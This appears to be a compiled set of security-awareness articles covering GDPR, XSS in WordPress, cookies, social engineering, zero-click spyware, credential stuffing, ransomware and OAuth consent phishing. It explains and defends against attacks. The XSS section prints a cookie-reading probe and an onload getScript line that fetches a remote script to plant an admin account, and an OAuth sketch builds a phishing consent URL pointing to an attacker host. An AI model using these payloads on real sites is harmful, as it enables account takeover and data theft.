GDPR stands for General Data Protection Regulation. It is a European Union (EU) law that came into effect on 25th May 2018. GDPR governs the way in which we can use, process, and store personal data (information about an identifiable, living person). It applies to all organisations within the EU, as well as those supplying goods or services to the EU or monitoring EU citizens, so it is essential for businesses and organisations to understand exactly what GDPR requires of them. It is the legislative framework established to protect the fundamental rights of data subjects whose personal information and sensitive data are stored by organisations. Data subjects now have the right to make a subject access request for their personal information, and the right to demand that an organisation destroy it. These regulations affect most business sectors, from marketing to health services, so becoming GDPR compliant is essential to avoid the crippling fines administered by the Information Commissioner’s Office (ICO).
GDPR Key Principles:
Lawfulness, transparency and fairness
Only using data for the specific lawful purpose for which it was obtained, the most lenient lawful basis being legitimate interests
Only acquiring data that we strictly need
Ensuring any data we possess is accurate
Integrity and confidentiality
Why Is GDPR Important?
Primarily, GDPR is important because it provides a single set of rules for all EU organisations to adhere to, giving businesses a level playing field and making the transfer of data between EU countries quicker and more transparent. It also empowers EU citizens by giving them more control over the ways in which their personal data is used. Prior to the introduction of GDPR, the European Commission found that a mere 15% of citizens felt that they had complete control over the information they provided online. With such low trust amongst the general public, it is clear that consumer habits will ultimately be affected. Measures to rebuild this confidence, through the introduction and proper implementation of GDPR, are expected to increase trade. Thorough implementation of data protection policies and staff education are important, as non-compliance could result in a data breach. The Information Commissioner’s Office (ICO) can issue fines of up to 4% of your annual turnover or €20 million, whichever is greater, in the event of a serious data breach. Data protection training is a necessity in mitigating the risk of data breaches.
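The fine ceiling described above is simply the greater of two numbers. As a minimal sketch (the figures are the statutory maximums for the most serious infringements; the function name is invented for illustration):

```python
def max_gdpr_fine(annual_turnover_eur: float) -> float:
    """Upper bound of a GDPR fine for the most serious infringements:
    the greater of 4% of annual worldwide turnover or EUR 20 million."""
    return max(0.04 * annual_turnover_eur, 20_000_000.0)

# For a company with EUR 1 billion turnover, 4% (EUR 40M) exceeds the EUR 20M floor.
print(max_gdpr_fine(1_000_000_000))   # 40000000.0
# For EUR 100 million turnover, the EUR 20M floor applies instead.
print(max_gdpr_fine(100_000_000))     # 20000000.0
```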
Vulnerabilities are a fact of life for anyone managing a website, even when using a well-established content management system like WordPress. Not all vulnerabilities are equal, with some allowing access to sensitive data that would normally be hidden from public view, while others could allow a malicious actor to take full control of an affected website. There are many types of vulnerabilities, including broken access control, misconfiguration, data integrity failures, and injection, among others. One type of injection vulnerability that is often underestimated, but can provide a wide range of threats to a website, is Cross-Site Scripting, also known as “XSS”. In a single 30-day period, Wordfence blocked a total of 31,153,743 XSS exploit attempts, making this one of the most common attack types we see.
What is Cross-Site Scripting?
Without breaking XSS down into its various uses, there are three primary categories of XSS, each with different aspects that could be valuable to a malicious actor: stored, reflected, and DOM-based XSS. Stored XSS also includes a sub-type known as blind XSS.
Stored Cross-Site Scripting could be considered the most nefarious type of XSS. These vulnerabilities allow exploits to be stored on the affected server. This could be in a comment, review, forum, or other element that keeps the content stored in a database or file either long-term or permanently. Any time a victim visits a location where the script is rendered, the stored exploit will execute in their browser.
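As a hypothetical sketch of why stored XSS is dangerous, and how escaping on output defuses it (the comment text and markup here are invented for illustration):

```python
import html

# A malicious comment is stored verbatim in the database, then rendered
# into every visitor's page. Escaping on output neutralises the payload.
stored_comment = "Nice post! <script>alert(document.cookie)</script>"

unsafe_page = f"<div class='comment'>{stored_comment}</div>"
safe_page = f"<div class='comment'>{html.escape(stored_comment)}</div>"

print("<script>" in unsafe_page)  # True  -- payload would execute in the browser
print("<script>" in safe_page)    # False -- rendered as inert text instead
```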
Blind Cross-Site Scripting is a sub-type of stored XSS that is not rendered in a public location. As it is still stored on the server, this category is not considered a separate type of XSS itself. In an attack utilizing blind XSS, the malicious actor will need to submit their exploit to a location that would be accessed by a back-end user, such as a site administrator. One example would be a feedback form that submits feedback to the administrator regarding site features. When the administrator logs in to the website’s admin panel, and accesses the feedback, the exploit will run in the administrator’s browser.
Reflected Cross-Site Scripting is a more interactive form of XSS. This type of XSS executes immediately and requires tricking the victim into submitting the malicious payload themselves, often by clicking on a crafted link or visiting an attacker-controlled form. Exploits for reflected XSS vulnerabilities often use arguments added to a URL, search results, or error messages to return data to the browser, or to send data to a malicious actor. Essentially, the threat actor crafts a URL or form field entry to inject their malicious code, and the website incorporates that code in the submission process for the vulnerable function. Attacks utilizing reflected XSS may require an email or message containing a specially crafted link to be opened by an administrator or other site user in order to obtain the desired result from the exploit. This XSS type generally involves some degree of social engineering to be successful, and, because the payload is never stored on the server, the chance of success relies entirely on that initial interaction with the user.
In January of 2022, the Wordfence team discovered a reflected XSS vulnerability in the Profile Builder – User Profile & User Registration Forms plugin. The vulnerability allowed page content to be modified simply by crafting a URL for the site. Here we generated an alert using the site_url parameter and updated the page text to read “404 Page Not Found”, a common error message that is unlikely to cause alarm but could entice a victim to click on the redirect link that triggers the pop-up.
DOM-Based Cross-Site Scripting is similar to reflected XSS, with the defining difference being that the modifications are made entirely in the DOM environment. Essentially, an attack using DOM-based XSS does not require any action to be taken on the server, only in the victim’s browser. While the HTTP response from the server remains unchanged, a DOM-based XSS vulnerability can still allow a malicious actor to redirect a visitor to a site under their control, or even collect sensitive data.
How Does Cross-Site Scripting Impact WordPress Sites?
Cross-Site Scripting (XSS) vulnerabilities can have a number of repercussions for WordPress websites. Because WordPress pages are generated dynamically on page load, with content updated and stored in a database, it can be easier for a malicious actor to exploit a stored or blind XSS vulnerability on the website, which means an attacker often does not need to rely on social engineering a victim in order for their XSS payload to execute.
Using Cross-Site Scripting to Manipulate Websites
One of the most well-known ways that XSS affects WordPress websites is by manipulating the page content. This can be used to generate popups, inject spam, or even redirect a visitor to another website entirely. This use of XSS provides malicious actors with the ability to make visitors lose faith in a website, view ads or other content that would otherwise not be seen on the website, or even convince a visitor that they are interacting with the intended website despite being redirected to a look-alike domain or similar website that is under the control of the malicious actor.
When testing for XSS vulnerabilities, security researchers often use a simple method such as alert(), prompt(), or print() in order to test if the browser will execute the method and display the information contained in the payload. This typically looks like the following and generally causes little to no harm to the impacted website:
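(The original article’s screenshot of such a test is not reproduced here; the following is a representative stand-in for the kind of harmless probe payload described, injected into a vulnerable parameter.)

```html
<script>alert(document.cookie)</script>
```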
This method can also be used to prompt a visitor to provide sensitive information, or interact with the page in ways that would normally not be intended and could lead to damage to the website or stolen information.
Stealing Data With Cross-Site Scripting
XSS is one of the easier vulnerabilities a malicious actor can exploit in order to steal data from a website. Specially crafted URLs can be sent to administrators or other site users to add elements to the page that send form data to the malicious actor as well as, or instead of, the intended location of the data being submitted on the website under normal conditions.
If this form of data theft is used on a vulnerable login page, a threat actor could easily gain access to usernames and passwords that could be used in later attacks. These attacks could be against the same website, or used in credential stuffing attacks against a variety of websites such as email services and financial institutions.
Taking Advantage of Cross-Site Scripting to Take Over Accounts
Perhaps one of the most dangerous types of attacks that are possible through XSS vulnerabilities is an account takeover. This can be accomplished through a variety of methods, including the use of stolen cookies, similar to the example above. In addition to simply using cookies to access an administrator account, malicious actors will often create fake administrator accounts under their control, and may even inject backdoors into the website. Backdoors then give the malicious actor the ability to perform further actions at a later time.
If an XSS vulnerability exists on a site, injecting a malicious administrator user can be light work for a threat actor if they can get an administrator of the vulnerable website to click a link that includes an encoded payload, or if another stored XSS vulnerability can be exploited. In this example we injected the admin user by pulling the malicious code from a web-accessible location, using a common URL shortener to further hide the true location of the malicious script. That link can then be utilized in a specially crafted URL, or injected into a vulnerable form with something like onload=jQuery.getScript('https://bit.ly/<short_code>'); to load the script that injects a malicious admin user when the page loads.
Tools Make Light Work of Exploits
There are tools available that make it easy to exploit vulnerabilities like Cross-Site Scripting (XSS). Some tools are created by malicious actors for malicious actors, while others are created by cybersecurity professionals for the purpose of testing for vulnerabilities in order to prevent the possibility of an attack. No matter what the purpose of the tool is, if it works, malicious actors will use it. One such tool is a freely available penetration testing tool called BeEF. This tool is designed to work with a browser to find client-side vulnerabilities in a web app. It is great for administrators, as it allows them to easily test their own web apps for XSS and other client-side vulnerabilities that may be present. The flip side is that it can also be used by threat actors looking for potential attack targets.
One thing that is consistent across all of these exploits is the use of requests to manipulate the website. These requests can be logged and used to block malicious actions based on the request parameters and the strings contained within the request. The one exception is DOM-based XSS, which cannot be logged on the web server because it is processed entirely within the victim’s browser. The request parameters that malicious actors use are often common fields, such as the WordPress search parameter $_GET['s'], and attacks are often just guesswork hoping to find a common parameter with an exploitable vulnerability. The most common request parameter we have seen threat actors attempting to attack recently is $_GET['url'], which is typically used to identify the domain name of the server the website is loaded from.
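As a toy illustration of that kind of request-log screening (the patterns and function here are invented for this sketch; production firewalls use far more robust rule sets):

```python
import re
from urllib.parse import urlparse, parse_qs

# Naive signatures for common XSS probes seen in query strings.
XSS_PATTERNS = re.compile(r"(<script\b|onload\s*=|onerror\s*=|javascript:)",
                          re.IGNORECASE)

def suspicious_params(url: str) -> list:
    """Return the names of query parameters carrying likely XSS payloads."""
    params = parse_qs(urlparse(url).query)
    return [name for name, values in params.items()
            if any(XSS_PATTERNS.search(v) for v in values)]

print(suspicious_params("https://example.com/?s=<script>alert(1)</script>"))  # ['s']
print(suspicious_params("https://example.com/?s=wordpress+security"))         # []
```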
One of the best ways to protect your website against XSS vulnerabilities is to keep WordPress and all of your plugins updated. Sometimes attackers target a zero-day vulnerability, and a patch is not available immediately, which is why the Wordfence firewall comes with built-in XSS protection to protect all Wordfence users.
We asked the engineer who invented cookies what they mean and how to handle them.
YOU ARE NOT the only person irritated by those pesky cookie permissions boxes. If you click “Accept” by rote, you have no idea what you’re agreeing to. Or perhaps you don’t care? Many users think they have to accept all cookies to access the website, but that’s not always the case. Another option is to manage your cookies, but what does that even mean?
To find out, we spoke to Lou Montulli, the engineer who invented cookies at age 23.
“I’m just like everybody else,” says Montulli. “I want that pop-up to go away as soon as possible. The idea of asking people about permissions every single time they go to a website is annoying.”
Every website you visit places cookies on your browser. The purpose of the cookie is to allow a website to recognize a browser. That’s why you can return to a site and be recognized, even if you don’t always log in. It’s why the stuff in your shopping cart is still there the next day, or that article remembers where you stopped reading. You don’t have to “introduce” yourself every time you visit a site, but is the convenience worth it?
With Montulli’s help, here are some of the most frequently used terms those annoying permissions boxes are asking you about, and what you might want to choose when you see them.
First, let’s explain what some of the types of cookies you’ll see really do:
Session Cookies are temporary. These aren’t saved when you quit your browser.
Persistent Cookies will stay on your hard drive until you delete them, or your browser does. These have an expiration date written into their code. That expiration date varies depending on the site or service that issued them and is chosen by the website that places them on your browser.
First-Party Cookies are those placed directly onto your device by the website you’re visiting.
Third-Party Cookies are placed on your device, but not by the website you’re on (the first party). Instead, they’re put onto your device by advertisers, data partners, or analytics tools that track visitors, usually at the request of that first party. Think Google Analytics for your favorite tech magazine website, for example.
Strictly Necessary Cookies allow you to view a website’s content and use its features.
Preference Cookies, aka Functionality Cookies, allow a website to remember data you typed: for example, your user ID, password, delivery address, email, phone, and preferred method of payment.
Statistics Cookies, aka Performance Cookies, record how you used a website. Although these see links clicked and pages visited, your identity is not attached to these stats. These can include cookies from a third party: if a website uses a third party’s analytics system to track what visitors do on that site, the tracking info is divulged only to the website that hired the third party.
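For a concrete view of how session and persistent cookies differ on the wire, here is a small sketch using Python’s standard library (the cookie names and values are invented):

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()

# Session cookie: no expiry attribute, so it is discarded when the browser quits.
cookie["sessionid"] = "abc123"

# Persistent cookie: the site chooses an expiry (here, roughly 30 days).
cookie["prefs"] = "dark"
cookie["prefs"]["max-age"] = 60 * 60 * 24 * 30

print(cookie["sessionid"].OutputString())  # sessionid=abc123
print(cookie["prefs"].OutputString())      # prefs=dark; Max-Age=2592000
```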
What Am I Supposed to Choose? Does It Matter?
Montulli refers to the pop-up permissions box as “a really silly idea.” His preference would be a much more efficient and technical solution. For example, a user could choose their cookie preferences once in their browser, and every website they visit would honor that choice, similar to the design of Do Not Track. Montulli explained it like this: “Say I want to accept one type of cookie, but not that other cookie, or those cookies, any website could just ask the browser once what any user’s preferences are.” One and done.
That would be better, but what happens when you click “Accept All”—aside from thoughts like, Why does every website keep asking me these questions?
What many people (especially Americans) may not know is that in 2018, the European Union (EU) passed the General Data Protection Regulation (GDPR). And even if they have heard of it, they may not know enough to understand that this law is partially why cookie permission boxes are becoming more prevalent.
As part of GDPR, companies based outside Europe can be hit with enormous fines if they track and analyze EU visitors to their websites without consent. In other words, say your company resides in New York, but has European visitors and customers, or collects their data. If that’s the case, it can be penalized to the tune of tens of millions in fines if it doesn’t disclose its data collection and obtain the user’s consent.
Understandably, American companies want to avoid huge fines, which is why US users are seeing more and more of these permission boxes.
The boxes are designed to offer users more control over their data, as the EU law was put into place to protect all data belonging to EU citizens and residents. The confusion within the US market exists because the country doesn’t have similar laws to protect the privacy of its citizens.
In February 2022, Saryu Nayyar wrote a piece for Forbes that asks if it’s time for a US version of GDPR. Nayyar wrote that the point of such a law would be “gaining explicit consent for collecting data and deleting data if consent is withdrawn.” That sounds like an awesome idea, but after consulting Montulli, the privacy plot thickens.
Personally, I find it impossible to separate cookies and privacy online. I asked Montulli if it’s true that everything on the internet stays on the internet.
“No,” he says. That’s because information on the internet is detached from your current online presence. The purpose of the cookie is to allow a website to know when the same browser returns. The cookie may contain additional pieces of information. “But the predominant use of it is to pass an ID to your browser as an identifier,” he says.
“Why push on a locked door when there’s an open window?”
As any seasoned fly angler knows, trout are highly selective, continuous feeders whose entire survival strategy centers on conserving energy, remaining close to a safe holding place, and gaining maximum protein intake with minimal movement. To fool the wily trout, fly anglers have developed the practice of “matching the hatch”: presenting an artificial fly that most closely resembles what the trout are currently feeding on, and getting it close to where a feeding trout is holding. Often, with the right presentation, the trout is fooled and hooked.
So what does fly fishing have to do with cyber security?
In many ways, cybercriminals behave exactly like seasoned fly anglers. Rarely do they waste time, energy, and resources bombarding a company’s firewall, or, in the fly-fishing analogy, randomly cast using any fly pattern available. As cybercrime becomes more sophisticated and increasingly controlled by criminal gangs and nation states, attackers favor a targeted approach. Cybercriminals today look for the easiest and quickest way through a company’s security defenses, often focusing on individual employees using an approach called social engineering.
Cybercriminals, like fly anglers, look for the easiest way to fool their target. And in today’s disrupted business world that seems to be employees working from home, where in most cases the home environment is far less secure than the office IT environment. They also, like a fly angler matching the hatch, impersonate senior executives, demanding that a lower-level employee (for example, in the finance department) immediately wire money to a fake client account. All too often the employee, on receiving an urgent email from a named senior executive, complies.
The savvy trout angler spends a great deal of time understanding the trout species they are targeting, the river environment, the types of insect life and potential food sources, most active feeding times etc. They even visit nearby fly shops and talk with knowledgeable fishing guides for specific information. They build a knowledge base used to match the hatch and fool the trout.
In a similar way, a cybercriminal spends a great amount of time researching the company they are targeting. They scour LinkedIn profiles, search company websites for the names and titles of employees, gather information about employees on Facebook, Tinder, Instagram, Snapchat and other social media platforms. Recently they have begun to telephone employees at home pretending to be a legitimate research company, even offering cash for answering survey questions. In many cases, employee emails and other confidential information can be purchased from other criminal groups on the Dark Net. Using all this information they put together a list of potential employees to target with Phishing emails and social engineering.
Trout anglers know that older, larger trout are more “educated” at telling real food from an angler’s imitation. Older trout have probably seen numerous presentations from many different anglers and learned to be wary and highly selective. Also, the clearer the water, the warier trout are in general, to protect themselves from predators. Smaller, younger trout have yet to learn and are easier to fool.
Cybercriminals know that new employees are easier to fool as well. This is especially true when cyber security training is minimal and there is little peer-to-peer education about what to watch out for when it comes to email phishing and social engineering. And working from home has in most cases reduced the amount of team learning and peer-to-peer interaction, which provides a safe place for new employees to ask questions and seek advice. In many training classes, few employees want to be singled out for asking “naïve” questions.
A Human Approach to Mitigating Cybercrime
To blunt the growing impact of cybercrime, companies need to focus more on the human aspect of cyber security. In most organizations, 98% of the cyber security budget is spent on technology and less than 2% on employees. Yet 88% of cyber breaches are the result of human error, poor cyber hygiene, mismanagement, and insider actions. Just 12% of breaches are due to technology failures. And 61% of cyber victims fail to report the incident.
The analogy between fly fishing and cybercrime offers many opportunities for companies to improve their cyber security. For example, clarity of water in a trout stream is easily equated with open transparency and cross-functional communications in the corporate world. Learning from others, on-going communications about attempted cyberattacks and successful breaches allows everyone to learn quickly and become more aware and accountable. Having the IT department help secure the home technology and internet environment of senior executives, Board Directors and other high value targets helps prevent breaches and high-value-employee data mining by cyber criminals. Adding additional support for the cyber security and IT team to improve and keep on top of cyber hygiene, patches and software upgrades can go a long way in mitigating cyber risks.
Cyber security is the number one threat to businesses and organizations everywhere. Between 2020 and 2021, ransomware attacks increased by 60%, with the average ransomware payment approaching $4.5 million (IBM). And that’s just the payment to the hackers. The cost of downtime, lost revenue, reputational damage and decline in market value is nearly 10 times the ransom payment.
It is past time senior leaders prioritize the human firewall. Otherwise cybercrime will continue to grow and pose an ever growing threat to our global economy and way of life.
Zero-click attacks, especially when combined with zero-day vulnerabilities, are difficult to detect and becoming more common.
Zero-click attack definition
Zero-click attacks, unlike most cyberattacks, don’t require any interaction from the users they target, such as clicking on a link, enabling macros, or launching an executable. They are sophisticated, often used in cyberespionage campaigns, and tend to leave very few traces behind—which makes them dangerous.
Once a device is compromised, an attacker can choose to install surveillance software, or they can choose to enact a much more destructive strategy by encrypting the files and holding them for ransom. Generally, a victim can’t tell when and how they’ve been infected through a zero-click attack, which means users can do little to protect themselves.
How zero-click attacks work
Zero-click attacks have become increasingly popular in recent years, fueled by the rapidly growing surveillance industry. One of the most widely used spyware tools is NSO Group’s Pegasus, which has been used to monitor journalists, activists, world leaders, and company executives. While it’s not clear how each victim was targeted, it is believed that at least a few of them received a WhatsApp call they didn’t even have to answer.
Messaging apps are often targeted in zero-click attacks because they receive large amounts of data from unknown sources without requiring any action from the device owner. Most often, the attackers exploit a flaw in how data is validated or processed.
Other less-known zero-click attack types have stayed under the radar, says Aamir Lakhani, cybersecurity researcher at Fortinet’s FortiGuard Labs. He gives two examples: parser application exploits (“while a user views a picture in a PDF or a mail application, the attacker is silently exploiting a system without user clicks or interaction needed”) and “WiFi proximity attacks that seek to find exploits on a WiFi stack and upload exploit code into [the] user’s space [in the] kernel to remotely take over systems.”
Zero-click attacks often rely on zero-days, vulnerabilities that are unknown to the software maker. Not knowing they exist, the maker can’t issue patches to fix them, which can put users at risk. “Even very alert and aware users cannot avoid those double-whammy zero-day and zero-click attacks,” Lakhani says.
These attacks are often used against high-value targets because they are expensive. “Zerodium, which purchases vulnerabilities on the open market, pays up to $2.5M for zero-click vulnerabilities against Android,” says Ryan Olson, vice president of threat intelligence, Unit 42 at Palo Alto Networks.
Examples of zero-click attacks
The target of a zero-click attack can be anything from a smartphone to a desktop computer and even an IoT device. One of the first defining moments in their history happened in 2010 when security researcher Chris Paget demonstrated at DEFCON18 how to intercept phone calls and text messages using a Global System for Mobile Communications (GSM) vulnerability, explaining that the GSM protocol is broken by design. During his demo, he showed how easy it was for his international mobile subscriber identity (IMSI) catcher to intercept the mobile phone traffic of the audience.
Another early zero-click threat was discovered in 2015 when the Android malware family Shedun took advantage of the Android Accessibility Service’s legitimate functions to install adware without the user doing anything. “By gaining the permission to use the accessibility service, Shedun is able to read the text that appears on screen, determine if an application installation prompt is shown, scroll through the permission list, and finally, press the install button without any physical interaction from the user,” according to Lookout.
A year later, in 2016, things got even more complicated. A zero-click attack was implemented into the United Arab Emirates surveillance tool Karma, which took advantage of a zero-day found in iMessage. Karma only needed a user’s phone number or email address. Then, a text message was sent to the victim, who didn’t even have to click on a link to be infected.
Once that text arrived on an iPhone, the attackers were able to see photos, emails, and location data, among other items. The hacking unit that used this tool, dubbed Project Raven, included U.S. intelligence hackers who helped the United Arab Emirates monitor governments and human rights activists.
By the end of that decade, zero-click attacks were being noticed more often, as surveillance companies and nation-state actors started to develop tools that didn’t require any action from the user. “Attacks that we were previously seeing through links in SMS, moved to zero-click attacks by network injections,” says Etienne Maynier, technologist at Amnesty International.
Amnesty and the Citizen Lab worked on several cases involving NSO Group’s Pegasus spyware, which was linked to several murders, including that of the Washington Post journalist Jamal Khashoggi. Once installed on a phone, Pegasus can read text messages, track calls, monitor a victim’s location, access the device’s mic and camera, collect passwords, and gather information from apps.
Khashoggi and his close ones were not the only victims. In 2019, a flaw in WhatsApp was exploited to target civil society and political figures in Catalonia. The attack started with a video call made to the victim on WhatsApp. Answering the call wasn’t necessary, as the data sent to the chat app wasn’t sanitized properly. This allowed the Pegasus code to be executed on the target device, effectively installing the spyware. WhatsApp has since patched the vulnerability and notified 1,400 users who had been targeted.
Another sophisticated zero-click attack associated with NSO Group’s Pegasus was based on a vulnerability in Apple’s iMessage. In 2021, Citizen Lab found traces of this exploit being used to target a Saudi activist. This attack relies on an error in the way GIFs are parsed in iMessage and disguises a PDF document containing malicious code as a GIF. In its analysis of the exploit, Google Project Zero stated, “The most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox.” The iMessage vulnerability was fixed on September 13, 2021, in iOS 14.8.
Zero-click attacks don’t only target phones. In 2021, a zero-click vulnerability gave unauthenticated attackers full control over Hikvision security cameras. Later the same year, a flaw in Microsoft Teams was proved to be exploitable through a zero-click attack that gave hackers access to the target device across major operating systems (Windows, MacOS, Linux).
How to detect and mitigate zero-click attacks
Realistically, knowing if a victim is infected is quite tricky, and protecting against a zero-click attack is almost impossible. “Zero-click attacks are way more common than we thought,” says Maynier. He recommends potential targets encrypt all their data, update their devices, have strong passwords, and do everything in their power to protect their digital lives. There’s also something else he tells them: “Consider that they may be compromised and adapt to that.”
Still, users can do a few things to minimize the risk of being spied on. The simplest one is to restart the phone periodically if they own an iPhone. Experts at Amnesty have shown that this could potentially stop Pegasus from working on iOS—at least temporarily. This has the advantage of disabling any code running that has not achieved persistence. However, the disadvantage is that rebooting the device may erase the signs that an infection has occurred, making it much harder for security researchers to determine whether a device has been targeted with Pegasus.
Users should also avoid jailbreaking their devices, because it removes some of the security controls built into the firmware. In addition, since a jailbroken device allows the installation of unverified software, jailbreaking opens users up to installing vulnerable code that might be a prime target for a zero-click attack.
As always, maintaining good security hygiene can help. “Segmentation of networks, applications, and users, use of multifactor authentication, use of strong traffic monitoring, good cybersecurity hygiene, and advanced security analytics may prove to slow down or mitigate risks in specific situations,” says Lakhani. “[These] will also make post-exploitation activities difficult for attackers, even if they do compromise [the] systems.”
Maynier adds that high-profile targets should segregate data and have a device only for sensitive communications. He recommends users keep “the smallest amount of information possible on their phone (disappearing messages are a very good tool for that)” and leave it out of the room when they have important face-to-face conversations.
Organizations such as Amnesty and Citizen Lab have published guides instructing users to connect their smartphone to a PC and check to see whether they have been infected with Pegasus. The software used for this, Mobile Verification Toolkit, relies on known Indicators of Compromise such as cached favicons and URLs present in SMS messages. A user does not have to jailbreak their device to run this tool.
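Mobile Verification Toolkit automates this analysis, but the core idea — comparing artifacts extracted from a device backup against published indicators — is simple to illustrate. The sketch below shows the principle in Python; the domain list and URLs are invented for illustration, not real indicators of compromise (real IoCs are distributed as STIX2 files):

```python
# Sketch of indicator matching as performed by tools like MVT:
# extract URLs from device artifacts (e.g. SMS messages) and
# compare their hosts against a list of known-bad indicators.
from urllib.parse import urlparse

# Hypothetical indicator list; real IoCs come from STIX2 feeds.
KNOWN_BAD_DOMAINS = {"example-exploit-server.net", "bogus-cdn.example"}

def flag_suspicious(urls):
    """Return the URLs whose hostname matches a known indicator."""
    hits = []
    for url in urls:
        host = urlparse(url).hostname or ""
        if host in KNOWN_BAD_DOMAINS:
            hits.append(url)
    return hits

sms_urls = [
    "https://example-exploit-server.net/track?id=42",
    "https://apple.com/support",
]
print(flag_suspicious(sms_urls))  # only the first URL matches
```

Real tooling matches many more artifact types (process names, file paths, cached favicons), but the matching logic follows this shape.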
Also, Apple and WhatsApp have both sent messages to people who might have been targeted by zero-click attacks aimed at installing Pegasus. Some of those recipients then reached out to organizations such as Citizen Lab to analyze their devices further.
Yet technology alone won’t solve the problem, says Amnesty’s Maynier. “This is ultimately a question of policy and regulation,” he adds. “Amnesty, EDRi and many other organizations are calling for a global moratorium on the use, sale, and transfer of surveillance technology until there is a proper human rights regulatory framework in place that protects human rights defenders and civil society from the misuse of these tools.”
The policy answers will have to cover different aspects of this problem, he says, from export control to mandatory human rights due diligence for companies. “We need to put a stop on these widespread abuses first,” Maynier adds.
Credential stuffing is a hacking technique in which login credentials obtained (often stolen) from one site are used to attempt to log into one or more other services – typically higher-value sites like banks, credit card providers, etc.
This is why we recommend that you never re-use passwords.
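The mechanics are trivially simple, which is what makes the attack so common. The toy simulation below (all names and passwords are made up; a real site would store only password hashes) shows how a leak from one site unlocks accounts on another wherever a password was reused:

```python
# Toy illustration of credential stuffing: credentials leaked from
# site A are replayed against site B. All data here is invented.
leaked_from_site_a = [
    ("alice@example.com", "hunter2"),
    ("bob@example.com", "correct horse"),
]

# Site B's credential store (hashed in reality, plaintext here for
# clarity) — Alice reused her password, Bob did not.
site_b_accounts = {
    "alice@example.com": "hunter2",
    "bob@example.com": "a-unique-password",
}

def stuffing_hits(leak, accounts):
    """Return accounts on the second site that leaked credentials unlock."""
    return [user for user, pw in leak if accounts.get(user) == pw]

print(stuffing_hits(leaked_from_site_a, site_b_accounts))
# ['alice@example.com']
```

A unique password per site reduces the blast radius of any single breach to that one account.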
The video below gives a pretty clear explanation of the problem, and offers some ways around it (password managers, multi-factor authentication, passwordless login). We’ll be covering passwordless login soon…
Ransomware is a form of malware that encrypts a victim’s files. The attacker then demands a ransom from the victim, promising to restore access to the data upon payment.
Users are shown instructions for how to pay a fee to get the decryption key. The cost can range from a few hundred dollars to thousands, typically payable to cybercriminals in hard-to-trace cryptocurrency such as Bitcoin.
A “consent phishing” scam is an attempt by adversaries to get employees to install a malicious application and/or grant it permissions that will allow it to access sensitive data or perform unwanted functions.
This type of consent phishing relies on the OAuth 2.0 authorization technology. By implementing the OAuth protocol into an app or website, a developer gives a user the ability to grant permission to certain data without having to enter their password or other credentials.
Used by a variety of online companies including Microsoft, Google, and Facebook, OAuth is a way to try to simplify the login and authorization process for apps and websites through a single sign-on mechanism. However, as with many technologies, OAuth can be used for both beneficial and malicious purposes.
Microsoft details the problem step by step in its blog post:
An attacker registers an app with an OAuth 2.0 provider.
The app is configured in a way that makes it seem trustworthy, such as using the name of a popular product used in the same ecosystem.
The attacker gets a link in front of users, which may be done through conventional email-based phishing, by compromising a non-malicious website, or through other techniques.
The user clicks the link and is shown an authentic consent prompt asking them to grant the malicious app permissions to data.
If a user clicks Accept, they grant the app permissions to access sensitive data.
The app gets an authorization code, which it redeems for an access token, and potentially a refresh token.
The access token is used to make API calls on behalf of the user.
The attacker can then gain access to the user’s mail, forwarding rules, files, contacts, notes, profile, and other sensitive data.
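The consent link in those steps is just a standard OAuth 2.0 authorization URL; what makes it malicious is the app registered behind the client_id, not the URL format. A minimal sketch of how such a link is assembled (the endpoint, client_id, redirect URI, and scopes below are invented for illustration, loosely following the authorization-code flow):

```python
# Sketch of the authorization URL a consent-phishing mail might carry.
# The shape follows the OAuth 2.0 authorization-code flow; every
# concrete value below is a hypothetical placeholder.
from urllib.parse import urlencode

AUTHORIZE_ENDPOINT = "https://login.example.com/oauth2/v2.0/authorize"

params = {
    "client_id": "00000000-aaaa-bbbb-cccc-111111111111",  # attacker's registered app
    "response_type": "code",  # ask for an authorization code
    "redirect_uri": "https://attacker.example/callback",  # where the code is delivered
    "scope": "Mail.Read Contacts.Read offline_access",  # offline_access => refresh token
}

consent_url = AUTHORIZE_ENDPOINT + "?" + urlencode(params)
print(consent_url)
```

If the user clicks Accept on the resulting consent prompt, the code delivered to the redirect URI can be exchanged at the token endpoint for access and refresh tokens, which is why auditing and revoking app consents granted in your tenant is an important defensive control.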
“Part of the problem is that most users don’t understand what is happening,” Roger Grimes, data driven defense evangelist at KnowBe4 said. “They don’t know that a sign-on that they’ve used with Gmail, Facebook, Twitter or some other OAuth provider is now automatically being called and used or abused by another person. They don’t understand the permission prompts either. All they know is they clicked on an email link or an attachment and now their computer system is asking them to confirm some action that they really don’t understand.”
Fleeceware: Apps which are marketed as “free”, but which then trick the user into subscribing for paid services (which are available free elsewhere), often for excessive fees.
Common examples are horoscope apps, QR code or barcode scanners, and face filter apps targeted at younger users. Publishers of fleeceware target users who may be less cognizant of, or sensitive to, initial fees and recurring charges.
Often users are hooked in by free trials that prove difficult to cancel once the “free” period has lapsed.
These are currently most common on phone apps (both iPhone and Android), but the same techniques can be found with some desktop applications as well.
Watering-hole campaigns make use of malicious websites that lure visitors in with targeted content; cyberattackers often post links to that content on discussion boards and on social media to cast a wide net. When visitors click through to a malicious website, code running in the background infects their devices with malware.